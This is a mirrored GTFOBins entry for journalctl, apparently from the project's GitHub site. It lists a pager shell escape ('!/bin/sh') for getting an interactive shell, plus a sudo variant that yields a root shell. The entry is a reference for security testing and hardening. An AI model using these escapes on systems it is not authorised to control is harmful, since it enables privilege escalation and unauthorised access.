mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-02-06 02:22:56 +01:00
13 lines
279 B
Markdown
13 lines
279 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- description: This might not work if run by unprivileged users depending on the system configuration.
|
|
code: |
|
|
journalctl --system
|
|
!/bin/sh
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo journalctl
|
|
!/bin/sh
|
|
---
|